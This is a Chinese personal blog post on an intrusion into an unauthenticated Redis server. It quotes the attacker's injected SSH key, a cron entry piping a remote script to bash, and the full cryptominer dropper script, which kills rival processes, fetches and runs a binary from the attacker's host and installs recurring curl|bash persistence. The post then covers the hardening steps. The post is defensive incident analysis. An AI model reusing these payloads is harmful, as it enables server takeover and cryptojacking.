linux服务器安全—— 一次redis攻击的遭遇
笔者在写这篇文章的时候,个人的服务器正在遭受攻击,为了避免更多的人被坑,笔者淡定地边处理边写下这篇博客,希望可以帮助到大家!
环境:
ubuntu16.04.1 云服务器
redis
部署于tomcat上的个人应用
背景:
查看服务器状态时,发现redis用户的cpu使用率过高,打开redis日志,发现大量如下信息:
[10167] 04 Feb 19:05:20.065 * 1 changes in 900 seconds. Saving...
[10167] 04 Feb 19:05:20.066 * Background saving started by pid 21837
[21837] 04 Feb 19:05:20.069 # Failed opening .rdb for saving: Permission denied
[10167] 04 Feb 19:05:20.166 # Background saving error
[10167] 04 Feb 19:05:26.076 * 1 changes in 900 seconds. Saving...
[10167] 04 Feb 19:05:26.077 * Background saving started by pid 21855
[21855] 04 Feb 19:05:26.081 # Failed opening .rdb for saving: Permission denied
[10167] 04 Feb 19:05:26.177 # Background saving error
[10167] 04 Feb 19:05:32.086 * 1 changes in 900 seconds. Saving...
[10167] 04 Feb 19:05:32.087 * Background saving started by pid 21862
[21862] 04 Feb 19:05:32.089 # Failed opening .rdb for saving: Permission denied
[10167] 04 Feb 19:05:32.187 # Background saving error
[10167] 04 Feb 19:05:38.102 * 1 changes in 900 seconds. Saving...
[10167] 04 Feb 19:05:38.103 * Background saving started by pid 21864
[21864] 04 Feb 19:05:38.105 # Failed opening .rdb for saving: Permission denied
很明显,日志中显示redis存储于内存中的数据无法同步到文件系统中,原因是权限不够。
处理过程:
- 打开redis客户端,发现redis中被存入了两个莫名其妙的东西,key值分别为crackit和gfpyskqrma,我很确定自己的程序不会向redis中存入这两个东西。
admin@VM-202-164-ubuntu:/$ /servers/redis-2.8.19/src/redis-cli -p 6379 127.0.0.1:6379> keys * 1) "crackit" 2) "gfpyskqrma"
- 查看这两个都存的什么东西:
127.0.0.1:6379> get crackit "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCV6En/yo9BrY7ba0BsiFbg2hxLVdNerk1r3oKU1V0qeVMzRG8WdXkAiEXcvcmei1c85gPXDK3bqUX1XyLOy+hXfnTRRGfbMPOCclyoT/L3xeS1KMvWlP0qJVip7Mz+gwCEkQxSbZqdzBHStSFgAzoeGf12wUKEHLEpX7x7bs03vMUB8z7i1f10N+is84THQ4lMCpG4w3+CdeOKEssL2nL5abRhItjrfYgQH5cxtpwq55w97mVQ7PR9U2JSQSVWMTxy3rTx+7QP4JI2RS5yDRsjH4ISVwvu3gGyYAPfa6yofK+jjqChkyX4ipmTP9hAXf7lEvoZClVjCAwg1qslKieH [email protected]\n\n\n\n" 127.0.0.1:6379> get gfpyskqrma "\n\n* 10 * * * curl http://45.123.190.144:8080/lin.txt?redis | bash \n\n"
妥了,现在百分百确定服务器遭到了攻击。crackit存的是一个ssh公钥,gfpyskqrma存储的是一个cron定时任务。 - 看到这我就气急败坏了,连我吃泡面省钱买的云服务都不放过!不管三七二十一了,先一顿喷再说,直接在这两个key的值中喷他,也不管攻击者能不能看到啦,由于不清楚他是哪国的,中文英文拼音都用上一遍。哼!
- 好了,进入正题!现在研究一下他是怎么攻击的,打开redis config:
127.0.0.1:6379> CONFIG GET * 1) "dbfilename" 2) "root" 3) "requirepass" 4) "" 5) "masterauth" 6) "" 7) "unixsocket" 8) "" 9) "logfile" 10) "" 11) "pidfile" 12) "/var/run/redis.pid" 13) "maxmemory" 14) "0" 15) "maxmemory-samples" 16) "3" 17) "timeout" 18) "0" 19) "tcp-keepalive" 20) "0" 21) "auto-aof-rewrite-percentage" 22) "100" 23) "auto-aof-rewrite-min-size" 24) "67108864" 25) "hash-max-ziplist-entries" 26) "512" 27) "hash-max-ziplist-value" 28) "64" 29) "list-max-ziplist-entries" 30) "512" 31) "list-max-ziplist-value" 32) "64" 33) "set-max-intset-entries" 34) "512" 35) "zset-max-ziplist-entries" 36) "128" 37) "zset-max-ziplist-value" 38) "64" 39) "hll-sparse-max-bytes" 40) "3000" 41) "lua-time-limit" 42) "5000" 43) "slowlog-log-slower-than" 44) "10000" 45) "latency-monitor-threshold" 46) "0" 47) "slowlog-max-len" 48) "128" 49) "port" 50) "6379" 51) "tcp-backlog" 52) "511" 53) "databases" 54) "16" 55) "repl-ping-slave-period" 56) "10" 57) "repl-timeout" 58) "60" 59) "repl-backlog-size" 60) "1048576" 61) "repl-backlog-ttl" 62) "3600" 63) "maxclients" 64) "10000" 65) "watchdog-period" 66) "0" 67) "slave-priority" 68) "100" 69) "min-slaves-to-write" 70) "0" 71) "min-slaves-max-lag" 72) "10" 73) "hz" 74) "10" 75) "repl-diskless-sync-delay" 76) "5" 77) "no-appendfsync-on-rewrite" 78) "no" 79) "slave-serve-stale-data" 80) "yes" 81) "slave-read-only" 82) "yes" 83) "stop-writes-on-bgsave-error" 84) "no" 85) "daemonize" 86) "no" 87) "rdbcompression" 88) "yes" 89) "rdbchecksum" 90) "yes" 91) "activerehashing" 92) "yes" 93) "repl-disable-tcp-nodelay" 94) "no" 95) "repl-diskless-sync" 96) "no" 97) "aof-rewrite-incremental-fsync" 98) "yes" 99) "aof-load-truncated" 100) "yes" 101) "appendonly" 102) "no" 103) "dir" 104) "/var/spool/cron" 105) "maxmemory-policy" 106) "volatile-lru" 107) "appendfsync" 108) "everysec" 109) "save" 110) "900 1 300 10 60 10000" 111) "loglevel" 112) "notice" 113) "client-output-buffer-limit" 114) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60" 115) "unixsocketperm" 116) "0" 117) "slaveof" 118) "" 119) "notify-keyspace-events" 120) "gxE" 121) "bind" 122) "127.0.0.1 XXX.XXX.XXX.XXX" #此处马赛克 127.0.0.1:6379>
可以看到,攻击者修改了redis用于存储数据的rdb文件的文件名和路径,路径和文件拼凑到一起是/var/spool/cron/root。这是要改我root用户计划任务的节奏啊,还好我的redis不是使用root用户执行的(这就是redis日志中出现大量权限不足的原因),要不然攻击者已经得手了。想想就可怕,如果我的redis是使用root用户部署的,那攻击者岂不是为所欲为了。例如他如果把SSH公钥写到/root/.ssh中,就可以畅通无阻地登录我的服务器,或者他直接破坏掉我的/etc/passwd,那谁也别想登录了,只能刷系统了。没想到redis居然有这么大的漏洞。(通过redis的CONFIG SET dir /tmp/ 命令就可以直接动态设置存储路径了,其他参数的设置也一样) - 还没完。现在看一下他的定时脚本里边都是什么内容,直接浏览器打开http://45.123.190.144:8080/lin.txt?redis ,以下就是他的shell代码:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin HOST=45.123.190.144:8080 CALLBACK=$HOST DOWNLOADER="curl " #DOWNLOADER="wget -q -O - " LFILE_NAME="BoomBoom" # LFILE_PATH=`pwd`/$LFILE_NAME LFILE_PATH=/tmp/$LFILE_NAME DEFAULT_RFILE=$HOST/BoomBoom OTHERS_RFILE=$HOST/BoomBoom2 CLEAN () { grep -q -F '* soft memlock 262144' /etc/security/limits.conf || echo '* soft memlock 262144' >> /etc/security/limits.conf grep -q -F '* hard memlock 262144' /etc/security/limits.conf || echo '* hard memlock 262144' >> /etc/security/limits.conf grep -q -F 'vm.nr_hugepages = 256' /etc/sysctl.conf || echo 'vm.nr_hugepages = 256' >> /etc/sysctl.conf sysctl -w vm.nr_hugepages=256 RMLIST=(/tmp/*index_bak* /tmp/*httpd.conf* /tmp/*httpd.conf /tmp/a7b104c270 /tmp/Carbon) KILIST=(crobon sb1 wipefs AnXqV.yam [email protected] monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443) for item in ${RMLIST[@]} do rm -rf $item done for item in ${KILIST[@]} do ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9 done days=$(($(date +%s) / 60 / 60 / 24)) ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "45cToD1FzkjAxHRBhYKKLg5utMGENqyamWrY8nLNkVQ4hJgLHex1KNRZcz4finRjMpAYmPxDaXVpN2rV1jMNyXRdMEaH1YA"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9 pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4 pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df pkill -f cpuloadtest pkill -f crypto-pool pkill -f xmr pkill -f prohash pkill -f monero pkill -f miner pkill -f nanopool pkill -f minergate pkill -f yam pkill -f Silence pkill -f yam2 pkill -f minerd pkill -f Circle_MI.png pkill -f curl ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9 pkill -f biosetjenkins ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9 ps ax|grep -o './[0-9]* -c'| xargs pkill -f pkill -f Loopback pkill -f apaceha pkill -f cryptonight ps ax|grep tmp|grep irqa|grep -v grep|awk '{print $1}'|xargs ps --ppid|awk '{print $1}'|grep -v PID|xargs kill -9 ps ax|grep tmp|grep irqa|grep -v grep|awk '{print $1}'|xargs kill -9 pkill -f 45.76.102.45 pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f sleep pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr pkill -f XJnRj pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f 108.61.186.224 pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi ps -ef|grep '.so'|grep -v grep|cut -c 9-15|xargs kill -9; pkill -f 45.76.146.166 pkill -f irqbalanc1 pkill -f 188.120.247.175 rm -rf /tmp/httpd.conf rm -rf /tmp/conn rm -rf /tmp/conns rm -f /tmp/irq.sh rm -f /tmp/irqbalanc1 rm -f /tmp/irq } DEFAULT () { $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH chmod +x $LFILE_PATH ps -ef|grep $LFILE_NAME|grep -v grep if [ $? -ne 0 ]; then $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60" else $DOWNLOADER "${CALLBACK}/?info=l69" fi } OTHERS () { $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH chmod +x $LFILE_PATH ps -ef|grep $LFILE_NAME|grep -v grep if [ $? -ne 0 ]; then $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30" else $DOWNLOADER "${CALLBACK}/?info=l39" fi } CRON () { if [ -x /usr/bin/wget ] ; then echo '*/8 * * * * wget -q -O - $HOST/lin.txt |bash' > /tmp/.$LFILE_NAME.cron elif [ -x /usr/bin/curl ] ; then echo '*/8 * * * * curl $HOST/lin.txt |bash' > /tmp/.$LFILE_NAME.cron else exit 0; fi crontab -r crontab /tmp/.$LFILE_NAME.cron rm /tmp/.$LFILE_NAME.cron } INIT () { echo 128 > /proc/sys/vm/nr_hugepages sysctl -w vm.nr_hugepages=128 } KILL () { ps aux |grep -v sourplum | awk '{if($3>20.0) print $2}' | while read procid do kill -9 $procid done } CLEAN KILL INIT if [ $(getconf WORD_BIT) = '32' ] && [ $(getconf LONG_BIT) = '64' ] ; then DEFAULT else OTHERS fi # CRON crontab -r
等一下再看这个浑蛋做了什么,当务之急是解决redis的问题,切断他的攻击渠道。 - 先关掉redis吧
dmin@VM-202-164-ubuntu:~$ ps -aux|grep redis|grep -v grep admin 10167 0.0 1.3 38300 12136 ? Sl Feb03 1:27 /servers/redis-2.8.19/src/redis-server 127.0.0.1:6379 admin@VM-202-164-ubuntu:~$ kill -9 10167 admin@VM-202-164-ubuntu:~$ ps -aux|grep redis|grep -v grep admin@VM-202-164-ubuntu:~$
进入redis目录,修改redis配置文件。admin@VM-202-164-ubuntu:~/redis-2.8.19$ vi redis.conf
先修改一下bind:(说明一下:修改之前我是这样配置的bind 127.0.0.1 XXX.XXX.XXX.XXX,其中xxx是腾讯云服务器的内网ip,所以我没理解错的话,攻击者是使用腾讯云内网ip登录我的redis服务的。也就是说攻击者使用的也是腾讯云服务器)# Examples: # # bind 127.0.0.1 XXX.XXX.XXX.XXX bind 127.0.0.1
再改下端口吧,不要用默认的了:# Accept connections on the specified port, default is 6379. # If port 0 is specified Redis will not listen on a TCP socket. port 6970
禁用掉CONFIG和EVAL命令:# Example: # # rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52 # # It is also possible to completely kill a command by renaming it into # an empty string: # rename-command CONFIG "" rename-command EVAL ""
还有最关键的,设置一个密码:# Warning: since Redis is pretty fast an outside user can try up to # 150k passwords per second against a good box. This means that you should # use a very strong password otherwise it will be very easy to break. # requirepass 2wsx!QAZ
启动redis吧,现在应该足够安全了吧:admin@VM-202-164-ubuntu:~/redis-2.8.19$ /servers/redis-2.8.19/src/redis-cli -p 6970 -a '2wsx!QAZ'
启动客户端别忘记加上密码。最后就是修改应用程序中的redis端口和密码了。如果想要在其他服务器上也能访问到redis服务,那就只能bind上内网ip了,但是推荐使用iptables创建防火墙规则。 - 一定不要使用root部署redis,太可怕了。
- 现在redis基本安全了,不用担心再次受到攻击了,但是还要检查一下服务器,看看那个攻击者有没有留下什么东西,清理一下。
admin@VM-202-164-ubuntu:~$ cd .ssh -bash: cd: .ssh: No such file or directory admin@VM-202-164-ubuntu:~$ crontab -l no crontab for admin admin@VM-202-164-ubuntu:~$
admin@VM-202-164-ubuntu:/var/spool/cron$ ls -lrta total 20 drwxrwx--T 2 daemon daemon 4096 Jan 15 2016 atspool drwxr-xr-x 4 root root 4096 Oct 26 2016 .. drwxr-xr-x 5 root root 4096 Oct 26 2016 . drwxrwx--T 2 daemon daemon 4096 Oct 26 2016 atjobs drwx-wx--T 2 root crontab 4096 Feb 4 18:51 crontabs admin@VM-202-164-ubuntu:/var/spool/cron$ cd crontabs -bash: cd: crontabs: Permission denied
攻击者并没有将SSH公钥写入当前用户,crontabs权限正常,是安全的,看来他直接是奔着root去的,并没有得手。如此看来,这应该是一个攻击脚本了,那看来我喷他他是看不到了,唉! - 最后看一下那个脚本都想要干什么吧:
先是清了一下相关进程和临时文件->>杀掉了cpu占用大于20%的进程->>设置了一下nr_hugepages->>在他的服务器(45.123.190.144:8080/BoomBoom)上下载一个BoomBoom->>BoomBoom添加可执行权限。好吧,不明觉厉,下载了BoomBoom看看,2.17M的一个东西,不知道是什么。
好吧,先这样吧!希望可以帮到大家,希望各位大神们帮我研究一下BoomBoom是干什么用的!